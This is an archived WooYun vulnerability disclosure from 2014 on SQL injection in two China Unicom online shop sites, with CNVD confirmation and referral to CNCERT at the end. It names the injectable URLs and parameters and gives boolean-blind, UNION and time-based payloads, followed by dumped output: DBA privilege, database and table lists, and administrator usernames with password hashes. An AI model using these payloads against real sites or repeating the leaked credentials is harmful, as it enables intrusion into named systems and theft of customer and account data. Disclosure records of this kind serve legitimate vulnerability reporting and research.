乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-03-05: 细节已通知厂商并且等待厂商处理中 2014-03-10: 厂商已经确认,细节仅向厂商公开 2014-03-20: 细节向核心白帽子及相关领域专家公开 2014-03-30: 细节向普通白帽子公开 2014-04-09: 细节向实习白帽子公开 2014-04-19: 细节向公众公开
注入注入...
注入点:1.http://linxi.gov.cn/test.php?id=547 邢台联通官方网上商城2.http://www.75510010.com/adv/sz10010.aspx?sid=201402131635442602 深圳联通网上商城(公开未修复)
1.http://linxi.gov.cn/test.php?id=547DBA:
Place: GETParameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=547 AND 2532=2532 Type: UNION query Title: MySQL UNION query (NULL) - 12 columns Payload: id=547 UNION ALL SELECT NULL,CONCAT(0x71767a7371,0x50726c596d6765475973,0x71696d6371),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=547 AND SLEEP(5)---web application technology: PHP 5.2.6, Apache 2.2.9back-end DBMS: MySQL 5.0.11current user is DBA: True
139个table,涉及交易记录,超级管理员账户和密码:
Database: xtlt10010[139 tables]+------------------------------+| xt10010_activity || xt10010_activity_detail || xt10010_address || xt10010_admin || xt10010_adv || xt10010_adv_click || xt10010_adv_position || xt10010_album_class || xt10010_album_pic || xt10010_article || xt10010_article_class || xt10010_attribute || xt10010_attribute_value || xt10010_brand || xt10010_cart || xt10010_complain || xt10010_complain_goods || xt10010_complain_subject || xt10010_complain_talk || xt10010_consult || xt10010_coupon || xt10010_coupon_class || xt10010_daddress || xt10010_document || xt10010_evaluate_goods || xt10010_evaluate_goodsstat || xt10010_evaluate_store || xt10010_evaluate_storestat || xt10010_express || xt10010_favorites || xt10010_flowstat_1 || xt10010_flowstat_2 || xt10010_flowstat_3 || xt10010_flowstat_4 || xt10010_flowstat_5 || xt10010_gold_buy || xt10010_gold_log || xt10010_gold_payment || xt10010_goods || xt10010_goods1 || xt10010_goods_attr_index || xt10010_goods_class || xt10010_goods_class1 || xt10010_goods_class_staple || xt10010_goods_class_tag || xt10010_goods_group || xt10010_goods_spec || xt10010_goods_spec_index || xt10010_groupbuy_area || xt10010_groupbuy_class || xt10010_groupbuy_price_range || xt10010_groupbuy_template || xt10010_inform || xt10010_inform_subject || xt10010_inform_subject_type || xt10010_link || xt10010_mail_msg_temlates || xt10010_map || xt10010_member || xt10010_message || xt10010_navigation || xt10010_order || xt10010_order1 || xt10010_order_address || xt10010_order_goods || xt10010_order_log || xt10010_p_bundling || xt10010_p_bundling_goods || xt10010_p_bundling_quota || xt10010_p_mansong || xt10010_p_mansong_apply || xt10010_p_mansong_quota || xt10010_p_mansong_rule || xt10010_p_xianshi || xt10010_p_xianshi_apply || xt10010_p_xianshi_goods || xt10010_p_xianshi_quota || xt10010_payment || xt10010_points_cart || xt10010_points_goods || xt10010_points_log || xt10010_points_order || xt10010_points_orderaddress || xt10010_points_ordergoods || xt10010_predeposit_cash || xt10010_predeposit_log || xt10010_predeposit_recharge || xt10010_rec_position || xt10010_recommend || xt10010_recommend_goods || xt10010_refund_log || xt10010_return || xt10010_return_goods || xt10010_salenum || xt10010_seo || xt10010_setting || xt10010_sns_albumclass || xt10010_sns_albumpic || xt10010_sns_binding || xt10010_sns_comment || xt10010_sns_friend || xt10010_sns_goods || xt10010_sns_membertag || xt10010_sns_mtagmember || xt10010_sns_s_autosetting || xt10010_sns_s_comment || xt10010_sns_s_tracelog || xt10010_sns_setting || xt10010_sns_sharegoods || xt10010_sns_sharestore || xt10010_sns_tracelog || xt10010_sns_visitor || xt10010_spec || xt10010_spec_value || xt10010_store || xt10010_store_class || xt10010_store_class_goods || xt10010_store_extend || xt10010_store_goods_class || xt10010_store_grade || xt10010_store_gradelog || xt10010_store_navigation || xt10010_store_partner || xt10010_store_watermark || xt10010_transport || xt10010_transport_extend || xt10010_type || xt10010_type_brand || xt10010_type_spec || xt10010_upload || xt10010_voucher || xt10010_voucher_apply || xt10010_voucher_price || xt10010_voucher_quota || xt10010_voucher_template || xt10010_web || xt10010_web_code || xt10010_ztc_glodlog || xt10010_ztc_goods |+------------------------------+
管理员账户:
Table: xt10010_admin[2 entries]+----------+------------+----------------+----------------------------------+| admin_id | admin_name | admin_is_super | admin_password |+----------+------------+----------------+----------------------------------+| 1 | xtlld10010 | 1 | e63e6a0a6c8c852d005fc137d0fba214 || 2 | xt10010 | 0 | 65110e5d596e180f7e5b1a127bc3c5a8 |+----------+------------+----------------+----------------------------------+
2.http://www.75510010.com/adv/sz10010.aspx?sid=201402131635442602DBA权限:
current user is DBA: True
24个数据库:
available databases [24]:[*] CTXSYS[*] DBSNMP[*] DMSYS[*] EXFSYS[*] HUDBS[*] LT_TEST_0924_DB[*] LYQ[*] MDSYS[*] NIEHX[*] OLAPSYS[*] ORDSYS[*] OUTLN[*] QC[*] QUALITYCENTER_DEMO_DB[*] SCOTT[*] SYS[*] SYSMAN[*] SYSTEM[*] TSMSYS[*] UHUI[*] UHUITEST[*] WANGXF[*] WMSYS[*] XDB
交易信息,账户信息等敏感信息泄露:
Database: HUDBS[262 tables]+-------------------------------+| BANK_ACCT_TMP || CODESMITH_EXTENDED_PROPERTIES || GPRS_MO || GPRS_MO_2009 || H75510010_GROUP_CGWS || H75510010_IP_LAB || H75510010_JT_PRODUCT || H75510010_SHOP_2GOLD || H75510010_SHOP_ADV || H75510010_SHOP_ADVCOUNT || H75510010_SHOP_ADVCOUNTBAK || H75510010_SHOP_AGENTLIST || H75510010_SHOP_BAND || H75510010_SHOP_BUYPHONE || H75510010_SHOP_CARD || H75510010_SHOP_CHECKCODE || H75510010_SHOP_CHECKCODE_NO || H75510010_SHOP_DOCUMENT || H75510010_SHOP_FEETYPE || H75510010_SHOP_GLOVE || H75510010_SHOP_GROUPPRODUCT || H75510010_SHOP_LAB || H75510010_SHOP_LABNUMBER || H75510010_SHOP_LANUSER || H75510010_SHOP_LANUSER4M || H75510010_SHOP_MALL || H75510010_SHOP_NUMBER || H75510010_SHOP_NUMBERFEE || H75510010_SHOP_NUMBERMANAGER || H75510010_SHOP_NUMBERTYPE || H75510010_SHOP_NUMLAB || H75510010_SHOP_OLDCUSTOMER || H75510010_SHOP_PACKAGEPLAN || H75510010_SHOP_PHONE || H75510010_SHOP_PHONEDATA || H75510010_SHOP_PHONETAB || H75510010_SHOP_PRODUCT || H75510010_SHOP_PRODUCTGROUP || H75510010_SHOP_PUBLIC || H75510010_SHOP_PUSHCODE || H75510010_SHOP_PUSHLAB || H75510010_SHOP_TARGETMARKET || H75510010_SHOP_TMALLPRODUCT || H75510010_SHOP_TUAN || H75510010_SHOP_UHUIPRODUCT || H75510010_SHOP_UNIONINFO || H75510010_SHOP_USERINFO || H75510010_SHOP_WAP || H75510010_SHOP_WAPSTATUS || H75510010_UHZ_PRODUCTTYPE || HENRY || HUZATEMP || HUZATEMP1 || HUZATEST || HUZATEST2 || H_75510010_10010NEWS || H_75510010_AD_OPERATION || H_75510010_AD_ROLE || H_75510010_AD_ROLEOPT || H_75510010_AD_SALEMARKET || H_75510010_AD_USERDATA || H_75510010_AD_USERINFO || H_75510010_AD_USERINFO_1 || H_75510010_AD_USERROLE || H_75510010_BIRTHDAYNUM || H_75510010_BIRTHDAYUSERINFO || H_75510010_DC || H_75510010_GROUPNUMBER || H_75510010_GXNUM || H_75510010_GXUSERINFO || H_75510010_IPHONEVIP || H_75510010_LOG || H_75510010_NEWS || H_75510010_ORDER || H_75510010_PAYFEE || H_75510010_PHONE || H_75510010_PHONENUM || H_75510010_PHONENUM_TYPE || H_75510010_PRODUCTFILE || H_75510010_PRODUCTLESSPAY || H_75510010_PRODUCTPHONE || H_75510010_RECORD || H_75510010_REG || H_75510010_SALE || H_75510010_WM || H_75510010_WM_CHECKCODE || H_75510010_YYNUM || H_BDW_GPRS_DELETE || H_BSS_ALL_RECORD || H_BSS_RECORD || H_BUSI_CHECK || H_COMMISION || H_COMMISION_200907 || H_COMMISION_200908 || H_COMMISION_200909 || H_COMMISION_200910 || H_COMMISION_200911 || H_COMMISION_HIS || H_COMMISION_TEMP || H_DELNUMBER_TEMP || H_DINNERTYPE || H_GPRS_ALL || H_GPRS_ALL_TEST || H_H2_CODE || H_IVR_ALL || H_IVR_ALL_TEST || H_LOG || H_MENU_INFO || H_MSG_MT || H_MSG_MT_2009 || H_MSG_MT_HIS || H_OTHER_NUMBER || H_SMS_ALL || H_SMS_ALL_TEST || H_USER_ADMIN || H_USER_MENU || H_USER_MT_TMP || MICROSOFTDTPROPERTIES || MT_MSG || MT_MSG_HIS || MUSE_TELEROUTER || PLAN_TABLE || SMS_MO || TBLAUTHOR || TBLBANLIST || TBLBUDDYLIST || TBLCATEGORY || TBLCONFIGURATION || TBLDATETIMEFORMAT || TBLEMAILNOTIFY || TBLFORUM || TBLGROUP || TBLGUESTNAME || TBLPERMISSIONS || TBLPMMESSAGE || TBLPOLL || TBLPOLLCHOICE || TBLSMUT || TBLTHREAD || TBLTOPIC || TEMP_PREPAY_SMS_ALL || TF_I_NUM_10010 || TMP_PREPAY_SMS_ALL || T_4START_NUMBER || T_ACCP_REG || T_ACCP_REG_BAK || T_ACCP_REG_HUZA || T_CARD_ALL || T_CJQQ_ALL || T_CJQQ_ALL_TMP || T_CLERK_SMS_ALL || T_COLORE_SMS_ALL || T_COLORRING_SMS_ALL || T_COLORRING_SMS_ALL_2005 || T_COLORRING_SMS_ALL_2006 || T_COLORRING_SMS_ALL_2007 || T_COLORRING_SMS_ALL_2008 || T_COMMISSION_ALL || T_CPS_CUSTOMERPOINTS || T_CPS_CUSTOMERREF || T_CPS_CUSTOMERREF_TEMP || T_CPS_ORDER || T_CPS_POINTRULE || T_CPS_POINTSIMPORT || T_CPS_PRODUCT || T_CPS_USEPOINTS || T_C_FILELOAD || T_EC_CUSTOMER || T_EC_CUSTOMGROUPRULE || T_EC_EMPCHANNELRIGHT || T_EC_ESPDUTYTAB || T_EC_ESPPOSTSDUTYTAB || T_EC_ESPPOSTSTAB || T_EC_H75510010_SHOP_CHANNEL || T_EC_ORDERPAY || T_EC_ORGAN || T_EC_ORGEMP || T_EC_PICTURE || T_EC_SMSSSO || T_EC_SMSSSOTIMIT || T_EC_USERPOST || T_EMAIL_LIST || T_EXECPROC_CYCLE || T_EXECPROC_LIST || T_FIELDS || T_FOGOTPASS || T_FTP_FILES || T_FTP_INFO || T_GPRS_ALL || T_GPRS_ALL_PK || T_GPRS_ALL_TMP || T_G_USERTYPE || T_HG_GPRS_DEL || T_HG_GPRS_DEL1 || T_HUZA_TEMP || T_LDGJ_ALL_PK || T_MSG_MT || T_PAYMENT_SMS_ALL || T_PAYMENT_SMS_ALL_BAK || T_PREPAY_SMS_ALL || T_PREPAY_SMS_ALL_20081130 || T_PREPAY_SMS_ALL_BACKUP || T_PREPAY_SMS_ALL_BACKUP_2008 || T_PREPAY_SMS_ALL_BACKUP_2009 || T_PREPAY_SMS_ALL_BAK || T_PREPAY_SMS_ALL_TMP || T_PREPAY_SMS_TEMP || T_PREPAY_UPDATETIME || T_RESP_REASON || T_SMS_ALL || T_SMS_ALL_2006 || T_SMS_ALL_2007 || T_SMS_ALL_BAK || T_SMS_ALL_TEMP || T_SMS_ALL_TEMP_HUZA || T_SMS_SEQUENCE || T_SPJILI_SMS_ALL || T_TQYB_ALL_PK || T_USERTYPE || T_WAP_SMS_ALL || T_WEATHER_ALL || T_WEBCARDPRE_SMS_ALL || T_WEBCARD_SMS_ALL || Z_AGENT_ID || Z_AGENT_MENU || Z_BANK_ID || Z_BANK_RE_BILL || Z_BLACKLIST || Z_BOSSINFO || Z_COMMENDER || Z_COMMENDER_20081204 || Z_CUST_RANGE || Z_DEPARTMENT || Z_DINNERCONTENT || Z_DINNERTYPE || Z_DINNERTYPE_RUYI || Z_MENU || Z_MESSAGE || Z_PREPAY_COMMENDER || Z_PREPAY_COMMENDER_20081204 || Z_PREPAY_COMMENDER_20090408 || Z_PREPAY_COMMENDER_20090901 || Z_PROC_ROUTE_BUF || Z_PROC_ROUTE_BUF_BAK || Z_PROC_ROUTE_TEST || Z_PROC_TYPE || Z_ROUTE_NO || Z_ROUTE_TABLE || Z_SP_INFO || Z_SUGGESTION || Z_USER_TYPE || Z_USER_WAGE || Z_USER_WAGED || Z_WAGE_REC || Z_WAGE_REC_CLERK || Z_WAGE_REC_COLORE || Z_WAGE_REC_COLORRING || Z_WAGE_REC_PAYMENT || Z_WAGE_REC_PREPAY || Z_WAGE_REC_WAP || Z_WAGE_REC_WEBCARD || Z_WAGE_REC_WEBCARDPRE |+-------------------------------+
您懂!
危害等级:高
漏洞Rank:14
确认时间:2014-03-10 21:05
CNVD确认并复现所述情况,已经转由CNCERT将多个实例通报给中国联通集团公司,由其后续下发对应省公司处置。
暂无